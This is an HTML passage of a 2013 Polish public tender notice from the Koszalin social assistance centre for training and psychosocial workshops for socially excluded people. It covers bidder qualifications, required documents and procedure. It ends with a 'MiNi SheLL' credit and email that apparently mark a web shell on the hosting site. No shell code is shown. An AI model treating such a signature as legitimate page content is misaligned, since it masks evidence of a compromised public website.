<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.32.00.00-8, 80.57.00.00-0, 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunki dotyczące:
posiadania uprawnień do wykonania określonej działalności lub czynność, jeżeli przepisy prawa nakładają obowiązek ich posiadania jeżeli złoży wraz z ofertą podpisane oświadczenie, że spełnia warunki określone w art. 22 ust. 1 Ustawy Prawo zamówień publicznych, o którym mowa w pkt 12 ppkt 1 SIWZ, oraz dołączy do oferty oświadczenie o posiadanym Wpisie do Rejestru Instytucji Szkoleniowych, o którym mowa w pkt 12 ppkt 5 SIWZ oraz oświadczenie o posiadanym Wpisie do Rejestru Agencji Zatrudnienia prowadzonego zgodnie z art. 18 Ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy, o którym mowa w pkt 12 ppkt 6 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunki dotyczące:
posiadania wiedzy i doświadczenia jeżeli złoży wraz z ofertą podpisane oświadczenie, że spełnia warunki określone w art. 22 ust. 1 Ustawy Prawo zamówień publicznych, o którym mowa w pkt 12 ppkt 1 SIWZ oraz jeżeli wykaże, że posiada doświadczenie zawodowe, legitymując się wykonaniem lub wykonywaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 2 głównych usług, które polegały na świadczeniu usług szkoleniowych i lub warsztatów o tematyce psychospołecznej, z których każda obejmowała grupę minimum 40 osób zagrożonych wykluczeniem społecznym oraz załączy do oferty dowody, że usługi wymienione w wykazie zostały wykonane lub są wykonywane należycie (m.in. referencje);</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunki dotyczące:
dysponowania odpowiednim potencjałem technicznym jeżeli złoży wraz z ofertą podpisane oświadczenie, że spełnia warunki określone w art. 22 ust. 1 Ustawy Prawo zamówień publicznych, o którym mowa w pkt 12 ppkt 1 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunki dotyczące:
dysponowania osobami zdolnymi do wykonania zamówienia jeżeli złoży wraz z ofertą podpisane oświadczenie, że spełnia warunki określone w art. 22 ust. 1 Ustawy Prawo zamówień publicznych, o którym mowa w pkt 12 ppkt 1 SIWZ oraz dołączy do oferty wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, z którego będzie wynikało, że Wykonawca dysponuje:
3 osobami posiadającymi wykształcenie wyższe i kwalifikacje w zakresie doradztwa zawodowego oraz min. 2 lata doświadczenia w prowadzeniu grupowych warsztatów
w zakresie aktywizacji zawodowej dla osób bezrobotnych nieaktywnych zawodowo niepełnosprawnych, w których łącznie wzięło udział co najmniej 30 osób - dla Działań  C, G, K, O;
3 osobami posiadającymi wykształcenie wyższe oraz doświadczenie polegające
na przeprowadzeniu grupowych zajęć psychospołecznych, w których łącznie wzięło udział co najmniej 30 osób - dla Działań A, F 1 - warsztaty Szkoła dla rodzica, N;
2 osobami posiadającymi wykształcenie wyższe pedagogiczne oraz 2 lata doświadczenia w pracy pedagoga - dla Działania F 2 - Akademia atrakcji dla dzieci;
2 osobami posiadającymi wykształcenie min. średnie i  doświadczenie polegające na realizacji warsztatu ów i lub szkolenia eń w zakresie wizażu i lub stylizacji, w których łącznie wzięło udział co najmniej 20 osób - dla Działań B, H;
1 osobą posiadającą wykształcenie min. średnie w kierunku plastycznym lub wzornictwa oraz doświadczenie polegające na prowadzeniu warsztatu ów i lub szkolenia eń z zakresu rękodzieła artystycznego lub rękodzieła, w których łącznie wzięło udział co najmniej 10 osób - dla Działania D;
3 osobami posiadającymi kwalifikacje ratownika medycznego i  doświadczenie polegające na prowadzenia kursu ów i lub szkolenia eń z zakresu pierwszej pomocy przedmedycznej, w których łącznie wzięło udział co najmniej 30 osób - dla Działań E, J, L, P;
1 osobą posiadającą wykształcenie min. średnie i  doświadczenie polegające
na prowadzeniu warsztatu ów i lub szkolenia eń kulinarnych i lub gastronomicznych,
w których łącznie wzięło udział co najmniej 20 osób - dla Działania I;
1 osobą posiadającą wykształcenie min. średnie i  doświadczenie polegające
na prowadzeniu warsztatu ów i lub szkolenia eń z zakresu obsługi komputera,
w których łącznie wzięło udział co najmniej 10 osób - dla Działania M;
1 osobą posiadającą wykształcenie min. średnie i doświadczenie polegające
na prowadzeniu warsztatu ów i lub szkolenia eń z zakresu podstaw przedsiębiorczości, w których łącznie wzięło udział co najmniej 20 osób - dla Działania R.
Wraz z wykazem należy złożyć oświadczenie, że osoby, które będą uczestniczyć
w wykonywaniu zamówienia posiadają wymagane uprawnienia zawodowe.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunki dotyczące:
sytuacji ekonomicznej i finansowej jeżeli złoży wraz z ofertą podpisane oświadczenie, że spełnia warunki określone w art. 22 ust. 1 Ustawy Prawo zamówień publicznych, o którym mowa w pkt 12 ppkt 1 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy Wykonawcy (wraz z formularzem cenowym) - załącznik nr 1 do SIWZ;
W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, pełnomocnictwo określające jego zakres winno być złożone wraz z ofertą i podpisane przez osoby uprawnione do reprezentowania Wykonawcy. Pełnomocnictwo należy złożyć w oryginale a w przypadku kserokopii, pełnomocnictwo musi być poświadczone notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartych w umowie może nastąpić za zgodą obu stron wyrażoną w formie pisemnej, pod rygorem nieważności, i na zasadach, o których mowa w art. 144 ust.1 Ustawy Prawo zamówień publicznych z dnia 29.01.2004r. (t.j. Dz. U. z 2010 r. Nr 113, poz. 759  z późn. zm.)
Zamawiający zgodnie z art. 144 ust. 1 Ustawy - Prawo zamówień publicznych przewiduje możliwości dokonania zmiany umowy w formie aneksów w niżej wymienionych przypadkach:
Zmiany rzutujące na termin realizacji:
za zgodą Zamawiającego termin realizacji może ulec wydłużeniu (przedłużająca się procedura przetargowa, kataklizmy i siła wyższa, strajki itp., jeżeli mają wpływ na wykonanie przedmiotu zamówienia).
Zmiany rzutujące na wynagrodzenie:
dopuszcza się możliwość zmniejszenia liczby osób skierowanych do udziału w ramach Działań A, B, C, D, E, F 1, F 2, G, H ,I, J, K ,L, M, N, O, P, R  projektu; jednak nie więcej niż o 10% docelowej liczby osób, określonej w SIWZ.
W powyższym przypadku wynagrodzenie Wykonawcy za realizację Działania ulegnie proporcjonalnemu zmniejszeniu, stosownie do liczby osób skierowanych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> BIP: mops.koszalin.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja istotnych warunków zamówienia do pobrania w siedzibie Miejskiego Ośrodka Pomocy Społecznej w Koszalinie przy Al. Monte Cassino 2 pok. 221..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2013 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Społecznej Al. Monte Cassino 2, 75-412 Koszalin
Pokój nr 20 - kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com